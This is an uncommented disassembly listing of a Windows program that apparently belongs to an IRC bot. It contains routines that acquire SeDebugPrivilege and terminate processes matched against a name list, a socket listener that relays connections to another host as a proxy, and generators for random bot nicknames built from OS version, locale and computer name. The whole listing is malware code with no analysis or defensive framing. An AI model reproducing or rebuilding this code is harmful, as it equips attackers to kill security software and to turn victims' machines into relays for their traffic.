loc_411746: ; CODE XREF: sub_41172A+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_411746
pop edi
jmp short loc_411757
; ---------------------------------------------------------------------------
loc_411753: ; CODE XREF: sub_41172A+A�j
mov edx, [esp+4+arg_0]
loc_411757: ; CODE XREF: sub_41172A+27�j
test esi, esi
pop esi
jz short loc_411761
movzx ecx, byte ptr [edx]
add eax, ecx
loc_411761: ; CODE XREF: sub_41172A+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_41172A endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; ---------------------------------------------------------------------------
loc_41178A: ; CODE XREF: .text:004012AD�j
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+0Ch]
mov edx, [ebp+8]
push esi
xor esi, esi
cmp eax, 1
mov [ebp-4], esi
jle short loc_4117B7
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_4117A9: ; CODE XREF: .text:004117B1�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_4117A9
pop edi
cmp eax, 1
loc_4117B7: ; CODE XREF: .text:0041179D�j
jnz short loc_4117C4
mov al, [edx]
mov [ebp-4], al
movzx eax, word ptr [ebp-4]
add esi, eax
loc_4117C4: ; CODE XREF: .text:loc_4117B7�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
leave
retn
; ---------------------------------------------------------------------------
db 14h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4117F1 proc near ; CODE XREF: sub_401262�j
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_4953F4 ; GetCurrentProcess
push eax
call dword_491640 ; OpenProcessToken
test eax, eax
jnz short loc_411810
leave
retn
; ---------------------------------------------------------------------------
loc_411810: ; CODE XREF: sub_4117F1+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_491618 ; LookupPrivilegeValueA
test eax, eax
jz short loc_41184E
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_411837
or [ebp+var_8], 2
jmp short loc_41183B
; ---------------------------------------------------------------------------
loc_411837: ; CODE XREF: sub_4117F1+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41183B: ; CODE XREF: sub_4117F1+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_4916C8 ; AdjustTokenPrivileges
mov esi, eax
loc_41184E: ; CODE XREF: sub_4117F1+32�j
push [ebp+var_4]
call ds:dword_495358 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_4117F1 endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411876 proc near ; CODE XREF: sub_401280�j
var_554 = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_49167C, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_411A75
cmp dword_491660, ebx
jz loc_411A75
cmp dword_49157C, ebx
jz loc_411A75
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_401262
pop ecx
pop ecx
push ebx
push 0Fh
call dword_49167C ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_411A68
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_491660 ; Process32First
mov esi, ds:dword_495358
test eax, eax
jz loc_411A63
lea eax, [ebp+var_130]
push eax
push edi
call dword_49157C ; Process32Next
test eax, eax
jz loc_411A63
mov edi, ds:dword_495398
mov ebx, 1F0FFFh
loc_41193A: ; CODE XREF: sub_411876+1E5�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_4119A1
mov [ebp+var_4], offset off_43174C
loc_411948: ; CODE XREF: sub_411876+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+var_10C]
push eax
call ds:dword_4953FC ; lstrcmpi
test eax, eax
jz short loc_411970
add [ebp+var_4], 4
cmp [ebp+var_4], offset dword_43210C
jl short loc_411948
jmp loc_411A49
; ---------------------------------------------------------------------------
loc_411970: ; CODE XREF: sub_411876+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_411A49
push 0
push eax
call ds:dword_4953F8 ; TerminateProcess
test eax, eax
jnz loc_411A49
loc_411997: ; CODE XREF: sub_411876+1B9�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_411A49
; ---------------------------------------------------------------------------
loc_4119A1: ; CODE XREF: sub_411876+C9�j
cmp [ebp+arg_C], eax
jnz loc_411A34
cmp [ebp+arg_4], eax
jz loc_411A49
push [ebp+var_128]
push 8
call dword_49167C ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_4119F4
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_491528 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_4119FA
lea eax, [ebp+var_234]
jmp short loc_411A00
; ---------------------------------------------------------------------------
loc_4119F4: ; CODE XREF: sub_411876+15C�j
push [ebp+var_128]
loc_4119FA: ; CODE XREF: sub_411876+174�j
lea eax, [ebp+var_10C]
loc_411A00: ; CODE XREF: sub_411876+17C�j
push eax
lea eax, [ebp+var_554]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_416821
add esp, 10h
lea eax, [ebp+var_554]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
jmp loc_411997
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_411876+12E�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_411A7C
loc_411A49: ; CODE XREF: sub_411876+F5�j
; sub_411876+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_49157C ; Process32Next
test eax, eax
jnz loc_41193A
xor ebx, ebx
loc_411A63: ; CODE XREF: sub_411876+9D�j
; sub_411876+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_411A68: ; CODE XREF: sub_411876+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_401262
pop ecx
pop ecx
loc_411A75: ; CODE XREF: sub_411876+3A�j
; sub_411876+46�j ...
xor eax, eax
loc_411A77: ; CODE XREF: sub_411876+22D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_411A7C: ; CODE XREF: sub_411876+1D1�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_4953F8 ; TerminateProcess
test eax, eax
jnz short loc_411AA0
push edi
call esi ; CloseHandle
jmp short loc_411A75
; ---------------------------------------------------------------------------
loc_411AA0: ; CODE XREF: sub_411876+223�j
push 1
pop eax
jmp short loc_411A77
sub_411876 endp
; ---------------------------------------------------------------------------
db 8Bh dup(0CCh)
; ---------------------------------------------------------------------------
loc_411B30: ; CODE XREF: sub_401316�j
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+8]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp-98h]
push offset dword_434928
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp-298h]
push eax
call sub_416821
xor esi, esi
pop ecx
cmp [ebp-8], esi
pop ecx
jnz short loc_411B8F
push esi
lea eax, [ebp-298h]
push dword ptr [ebp-0Ch]
push eax
lea eax, [ebp-94h]
push eax
push dword ptr [ebp-98h]
call sub_4010D2
add esp, 14h
loc_411B8F: ; CODE XREF: .text:00411B6D�j
push dword ptr [ebp-10h]
lea eax, [ebp-94h]
push esi
push esi
push dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-98h]
call sub_401280
add esp, 18h
test eax, eax
jnz short loc_411BB7
push offset dword_4348F0
jmp short loc_411BBC
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: .text:00411BAE�j
push offset dword_4348BC
loc_411BBC: ; CODE XREF: .text:00411BB5�j
lea eax, [ebp-298h]
push eax
call sub_416821
cmp [ebp-8], esi
pop ecx
pop ecx
jnz short loc_411BEF
push esi
lea eax, [ebp-298h]
push dword ptr [ebp-0Ch]
push eax
lea eax, [ebp-94h]
push eax
push dword ptr [ebp-98h]
call sub_4010D2
add esp, 14h
loc_411BEF: ; CODE XREF: .text:00411BCD�j
lea eax, [ebp-298h]
push eax
call sub_401014
push dword ptr [ebp-14h]
call sub_4012A3
pop ecx
pop ecx
push esi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
; ---------------------------------------------------------------------------
db 37h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_411C45 proc near ; CODE XREF: sub_40124E�j
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_495398 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_411C77
push 0
push esi
call ds:dword_4953F8 ; TerminateProcess
test eax, eax
jnz short loc_411C77
push esi
xor edi, edi
call ds:dword_495358 ; CloseHandle
loc_411C77: ; CODE XREF: sub_411C45+1A�j
; sub_411C45+27�j
mov eax, edi
pop edi
pop esi
retn
sub_411C45 endp
; ---------------------------------------------------------------------------
db 0Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_411C89 proc near ; CODE XREF: sub_401357�j
push esi
xor esi, esi
loc_411C8C: ; CODE XREF: sub_411C89+1E�j
push 1
push esi
push esi
push esi
push esi
push esi
call sub_401280
add esp, 18h
push dword_431748
call ds:dword_495324 ; Sleep
jmp short loc_411C8C
sub_411C89 endp
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CB1 proc near ; CODE XREF: sub_40133E�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_416B18
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_427578
call sub_415ECC
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_411CB1 endp
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; ---------------------------------------------------------------------------
loc_411CED: ; CODE XREF: .text:00401253�j
call sub_416B18
cdq
idiv dword ptr [esp+4]
mov eax, edx
retn
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; ---------------------------------------------------------------------------
loc_411CFD: ; CODE XREF: sub_4011C7�j
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+8]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp-14Ch]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp-10h]
push ebx
push esi
push eax
call sub_415CA0
add esp, 0Ch
mov word ptr [ebp-10h], 2
push dword ptr [ebp-40h]
call dword_49165C ; htons
push 6
push edi
push 2
mov [ebp-0Eh], ax
mov [ebp-0Ch], esi
mov [ebp+8], ebx
call dword_4916DC ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_411E61
mov eax, [ebp-3Ch]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov dword_43E92C[eax], ebx
call dword_491578 ; WSAAsyncSelect
lea eax, [ebp-10h]
push 10h
push eax
push ebx
call dword_491688 ; bind
test eax, eax
jnz loc_411E61
push 0Ah
push ebx
call dword_491684 ; listen
test eax, eax
jnz loc_411E61
loc_411DA7: ; CODE XREF: .text:00411DBB�j
; .text:00411E3C�j
lea eax, [ebp+8]
push eax
lea eax, [ebp-24h]
push eax
push ebx
call dword_4916F0 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_411DA7
movzx eax, word ptr [ebp-22h]
push dword ptr [ebp-3Ch]
mov [ebp-148h], edi
mov [ebp-2Ch], esi
push eax
push dword ptr [ebp-20h]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-34Ch]
push offset dword_4349B0
push eax
call sub_416821
push edi
lea eax, [ebp-34Ch]
push 10h
push eax
call sub_40105F
mov [ebp-38h], eax
imul eax, 234h
mov ecx, [ebp-3Ch]
add esp, 20h
mov dword_43E924[eax], ecx
lea eax, [ebp-14h]
push eax
lea eax, [ebp-14Ch]
push esi
push eax
push offset sub_401055
push esi
push esi
call ds:dword_49532C ; CreateThread
mov ecx, [ebp-38h]
imul ecx, 234h
cmp eax, esi
mov dword_43E934[ecx], eax
jz short loc_411E4C
loc_411E39: ; CODE XREF: .text:00411E4A�j
cmp [ebp-2Ch], esi
jnz loc_411DA7
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_411E39
; ---------------------------------------------------------------------------
loc_411E4C: ; CODE XREF: .text:00411E37�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_43495C
call sub_4012B2
pop ecx
pop ecx
jmp short loc_411E64
; ---------------------------------------------------------------------------
loc_411E61: ; CODE XREF: .text:00411D5E�j
; .text:00411D90�j ...
mov edi, [ebp+8]
loc_411E64: ; CODE XREF: .text:00411E5F�j
push edi
call dword_4916F4 ; closesocket
push ebx
call dword_4916F4 ; closesocket
push dword ptr [ebp-3Ch]
call sub_4012A3
pop ecx
push esi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 62h dup(0CCh)
; ---------------------------------------------------------------------------
loc_411EE7: ; CODE XREF: sub_401055�j
push ebp
mov ebp, esp
mov eax, 1344h
call sub_416880
mov eax, [ebp+8]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp-144h]
rep movsd
mov ebx, [ebp-30h]
push 1
pop ecx
mov [ebp-4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_4916DC ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+8], esi
jz loc_41209D
push 10h
lea eax, [ebp-18h]
push edi
push eax
call sub_415CA0
add esp, 0Ch
mov word ptr [ebp-18h], 2
push dword ptr [ebp-3Ch]
call dword_49165C ; htons
mov [ebp-16h], ax
lea eax, [ebp-13Ch]
push eax
call dword_49169C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp-8], eax
jnz short loc_411F77
lea eax, [ebp-13Ch]
push eax
call dword_4916E0 ; gethostbyname
jmp short loc_411F85
; ---------------------------------------------------------------------------
loc_411F77: ; CODE XREF: .text:00411F66�j
push 2
lea eax, [ebp-8]
push 4
push eax
call dword_491614 ; gethostbyaddr
loc_411F85: ; CODE XREF: .text:00411F75�j
cmp eax, edi
jz loc_41209D
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp-14h], eax
lea eax, [ebp-18h]
push eax
push esi
call dword_491604 ; connect
cmp eax, 0FFFFFFFFh
jz loc_41209D
movzx eax, word ptr [ebp-16h]
push dword ptr [ebp-34h]
mov [ebp-20h], edi
push eax
push dword ptr [ebp-14h]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-344h]
push offset dword_434A68
push eax
call sub_416821
push esi
lea eax, [ebp-344h]
push 10h
push eax
call sub_40105F
imul ebx, 234h
mov [ebp-30h], eax
imul eax, 234h
mov ecx, [ebp-34h]
lea esi, dword_43E92C[ebx]
mov dword_43E924[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_43E930[eax], ecx
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-144h]
push edi
push eax
push offset sub_4011D1
push edi
push edi
call ds:dword_49532C ; CreateThread
mov ecx, [ebp-30h]
imul ecx, 234h
cmp eax, edi
mov dword_43E934[ecx], eax
jz short loc_41208A
loc_412037: ; CODE XREF: .text:00412044�j
cmp [ebp-20h], edi
jnz short loc_412046
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_412037
; ---------------------------------------------------------------------------
loc_412046: ; CODE XREF: .text:0041203A�j
mov ebx, 1000h
loc_41204B: ; CODE XREF: .text:00412086�j
push ebx
lea eax, [ebp-1344h]
push edi
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp-1344h]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_491674 ; recv
cmp eax, edi
jle short loc_41209D
push edi
push eax
lea eax, [ebp-1344h]
push eax
push dword ptr [ebp+8]
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41204B
jmp short loc_41209D
; ---------------------------------------------------------------------------
loc_41208A: ; CODE XREF: .text:00412035�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_434A10
call sub_4012B2
pop ecx
pop ecx
loc_41209D: ; CODE XREF: .text:00411F2B�j
; .text:00411F87�j ...
mov eax, [ebp-4]
imul eax, 234h
push dword_43E92C[eax]
call dword_4916F4 ; closesocket
push dword ptr [ebp+8]
call dword_4916F4 ; closesocket
push dword ptr [ebp-4]
call sub_4012A3
pop ecx
push edi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 79h dup(0CCh)
; ---------------------------------------------------------------------------
loc_412147: ; CODE XREF: sub_4011D1�j
push ebp
mov ebp, esp
mov eax, 1128h
call sub_416880
mov eax, [ebp+8]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp-128h]
rep movsd
mov esi, [ebp-14h]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_41217E: ; CODE XREF: .text:004121C3�j
push edi
lea eax, [ebp-1128h]
push 0
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp-1128h]
push 0
push edi
push eax
push dword_43E930[esi]
call dword_491674 ; recv
test eax, eax
jle short loc_4121C5
push 0
push eax
lea eax, [ebp-1128h]
push eax
push dword_43E92C[esi]
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41217E
loc_4121C5: ; CODE XREF: .text:004121A8�j
push dword_43E930[esi]
call dword_4916F4 ; closesocket
push dword ptr [ebp-14h]
call sub_4012A3
pop ecx
push 0
call ds:dword_495334 ; ExitThread
pop edi
pop esi
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41220B proc near ; CODE XREF: sub_401046�j
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aAwk ; "awk-"
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_4163D7
xor esi, esi
add esp, 10h
cmp dword_42C928, esi
jle short loc_412264
loc_41223E: ; CODE XREF: sub_41220B+57�j
call sub_416B18
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_4163D7
add esp, 14h
inc esi
cmp esi, dword_42C928
jl short loc_41223E
loc_412264: ; CODE XREF: sub_41220B+31�j
mov eax, edi
pop edi
pop esi
retn
sub_41220B endp
; ---------------------------------------------------------------------------
db 17h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_412280 proc near ; CODE XREF: sub_4011E0�j
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
pop ecx
call sub_416B18
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_42C928
test esi, esi
jle short loc_4122C3
loc_4122AD: ; CODE XREF: sub_412280+41�j
call sub_416B18
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_4122AD
loc_4122C3: ; CODE XREF: sub_412280+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_412280 endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4122E0: ; CODE XREF: .text:00401069�j
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_434B48
push eax
push esi
call ds:dword_4953F0 ; GetComputerNameA
movsx eax, byte_434B48
push 41h
pop ecx
push 1
pop edx
loc_41231C: ; CODE XREF: .text:00412327�j
cmp eax, ecx
jnz short loc_412323
mov [ebp-4], edx
loc_412323: ; CODE XREF: .text:0041231E�j
inc ecx
cmp ecx, 5Bh
jl short loc_41231C
push 61h
pop ecx
loc_41232C: ; CODE XREF: .text:00412337�j
cmp eax, ecx
jnz short loc_412333
mov [ebp-4], edx
loc_412333: ; CODE XREF: .text:0041232E�j
inc ecx
cmp ecx, 7Bh
jl short loc_41232C
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_4163D7
xor esi, esi
add esp, 0Ch
cmp dword_42C928, esi
jle short loc_412378
loc_412352: ; CODE XREF: .text:00412376�j
call sub_416B18
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_4163D7
add esp, 14h
inc esi
cmp esi, dword_42C928
jl short loc_412352
loc_412378: ; CODE XREF: .text:00412350�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4123A5: ; CODE XREF: .text:0040128F�j
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_495400 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aEmr3S ; "emr3-[%s]-"
push 1Ch
push edi
call sub_4163D7
xor esi, esi
add esp, 10h
cmp dword_42C928, esi
jle short loc_412414
loc_4123EE: ; CODE XREF: .text:00412412�j
call sub_416B18
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_4163D7
add esp, 14h
inc esi
cmp esi, dword_42C928
jl short loc_4123EE
loc_412414: ; CODE XREF: .text:004123EC�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 1Dh dup(0CCh)
; ---------------------------------------------------------------------------
loc_412437: ; CODE XREF: .text:0040103C�j
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_4370BC
mov dword ptr [ebp-94h], 94h
call ds:dword_495404 ; GetVersionExA
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_4124BB
cmp dword ptr [ebp-8Ch], 0
jnz short loc_41249B
cmp dword ptr [ebp-84h], 1
jnz short loc_41248B
mov esi, offset a95 ; "95"
loc_41248B: ; CODE XREF: .text:00412484�j
cmp dword ptr [ebp-84h], 2
jnz short loc_4124F7
mov esi, offset aNt ; "NT"
jmp short loc_4124F7
; ---------------------------------------------------------------------------
loc_41249B: ; CODE XREF: .text:0041247B�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_4124AB
mov esi, offset a98 ; "98"
jmp short loc_4124F7
; ---------------------------------------------------------------------------
loc_4124AB: ; CODE XREF: .text:004124A2�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_4124F2
mov esi, offset aMe_0 ; "ME"
jmp short loc_4124F7
; ---------------------------------------------------------------------------
loc_4124BB: ; CODE XREF: .text:00412472�j
cmp dword ptr [ebp-90h], 5
jnz short loc_4124F2
cmp dword ptr [ebp-8Ch], 0
jnz short loc_4124D4
mov esi, offset a2k ; "2K"
jmp short loc_4124F7
; ---------------------------------------------------------------------------
loc_4124D4: ; CODE XREF: .text:004124CB�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_4124E4
mov esi, offset aXp ; "XP"
jmp short loc_4124F7
; ---------------------------------------------------------------------------
loc_4124E4: ; CODE XREF: .text:004124DB�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_4124F7
loc_4124F2: ; CODE XREF: .text:004124B2�j
; .text:004124C2�j
mov esi, offset a??? ; "???"
loc_4124F7: ; CODE XREF: .text:00412492�j
; .text:00412499�j ...
mov edi, [ebp+8]
push esi
push offset aS_4 ; "[%s]|"
push 1Ch
push edi
call sub_4163D7
xor esi, esi
add esp, 10h
cmp dword_42C928, esi
jle short loc_41253B
loc_412515: ; CODE XREF: .text:00412539�j
call sub_416B18
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_4163D7
add esp, 14h
inc esi
cmp esi, dword_42C928
jl short loc_412515
loc_41253B: ; CODE XREF: .text:00412513�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 42h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412583 proc near ; CODE XREF: sub_401163�j
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_495340 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_4125D2
call dword_491668 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_4125BB
mov eax, offset byte_4370BC
loc_4125BB: ; CODE XREF: sub_412583+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_4163D7
add esp, 14h
jmp short loc_4125F2
; ---------------------------------------------------------------------------
loc_4125D2: ; CODE XREF: sub_412583+22�j
call dword_491668 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_4125E6
mov eax, offset byte_4370BC
loc_4125E6: ; CODE XREF: sub_412583+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416821
pop ecx
pop ecx
loc_4125F2: ; CODE XREF: sub_412583+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_4158E0
pop ecx
cmp eax, 2
pop esi
jbe short loc_412621
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_4168B0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_416A10
add esp, 18h
loc_412621: ; CODE XREF: sub_412583+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_412583 endp
; ---------------------------------------------------------------------------
db 28h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41264E proc near ; CODE XREF: sub_401343�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_434AD4
loc_41265A: ; CODE XREF: sub_41264E+3F�j
cmp [ebp+arg_C], 0
jz short loc_412675
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_416B70
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41267F
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_41264E+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_41267F: ; CODE XREF: sub_41264E+25�j
test eax, eax
jnz short loc_412691
add esi, 14h
inc edi
cmp esi, offset dword_434B38
jl short loc_41265A
jmp short loc_41269F
; ---------------------------------------------------------------------------
loc_412691: ; CODE XREF: sub_41264E+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call off_434AD8[eax*4]
pop ecx
loc_41269F: ; CODE XREF: sub_41264E+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_4126B2
push [ebp+arg_0]
call sub_401163
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4126B2: ; CODE XREF: sub_41264E+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_41264E endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
